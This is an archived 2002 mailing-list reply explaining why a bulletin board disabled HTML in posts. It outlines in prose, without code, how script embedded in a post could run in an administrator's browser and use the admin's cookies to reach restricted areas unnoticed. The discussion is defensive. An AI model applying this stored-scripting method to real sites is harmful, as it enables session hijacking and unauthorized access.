[Empeg-general] Re: HTML code in BBS post
Andy Norman
nospam at focus.demon.co.uk
Wed, 20 Mar 2002 14:24:00 GMT
But tell me how allowing HTML to be added to BBS posts can "allow control of a server!"
If the bbs software doesn't correctly filter javascript and vbscript from any HTML posted to it then it is indeed possible to get access to server functionality that you shouldn't be able to get to.
It works like this:
I post some HTML in a message to the BBS, with some carefully crafted javascript or vbscript embedded in it
the BBS admin opens up the message
the BBS software has failed to filter my script out properly
my script gets to run
my script is now running in the admins browser and therefore with all the admin's rights
my script then gets clever and manages to access the BBS areas that are off limits to me normally (this bit is much easier to do if MS XML is installed on the admin's machine as I can then make arbitary calls against pages on the bbs easily, complete with the admin's cookies)
if the settings on the admin's browser are sloppy enough then I can also mess around with data on their machine (the same applies to other user's machines too)
If I am very careful then all of this could happen without the admin being aware that anything is amis.
Now, this does all rely in everything being in place on both the server and the browser, the attacker having good knowledge of the BBS code etc
However this stuff is entirely possible, similar attacks have been demonstrated on public systems before (both Amazon and Yahoo had lousy script filtering at one point).
I have demonstrated such an attack on several intranet apps at places I have worked, so this stuff can be a real security risk.
Unfortnately filtering out the script while leaving the HTML intact can be quite difficult to get working 100%, so given that the BBS code was not written by Paul and so he couldn't trust it 100% I think he probably took the right desision to turn HTML markup off. The intranet apps I mention above (which are sold to third parties) now do not allow HTML markup in any data posted to them.